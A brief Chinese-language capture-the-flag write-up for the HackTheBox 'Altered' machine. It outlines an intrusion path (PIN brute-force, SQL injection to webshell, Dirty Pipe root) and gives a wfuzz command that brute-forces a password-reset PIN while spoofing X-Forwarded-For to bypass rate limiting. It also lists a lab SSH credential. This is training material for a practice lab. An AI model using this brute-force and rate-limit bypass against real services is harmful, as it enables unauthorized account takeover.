Altered
Altered
基本信息
export target="10.129.135.195"
ssh htb-ovuln@htb-we15mv8wps.htb-cloud.com
5m8otuMK
入侵路径
密码重置功能
绕过HTTP标头的速率限制进行暴力破解
利用SQL注入攻击获取WebShell(立足点)
利用Dirty Pipe 获取root权限
主机信息
开放端口 22 80
操作系统 | Ubuntu |
---|---|
中间件 | Nginx/1.18.0 |
脚本语言 | PHP |
开发框架 | Laravel |
Cookie | XSRF-TOKEN,laravel_session |
登录页面
尝试失败后出现密码重置功能。
爆破密码重置pin码
绕过请求限制 XFF头
$wfuzz -u 'http://10.129.135.195/api/resettoken' -X POST -d 'name=admin&pin=FUZ2Z' -w ipa.txt -z range,0000-9999 -t 50 -H 'X-Forwarded-For: 127.2.FUZZ' -m zip -p 127.0.0.1:8080
登录后台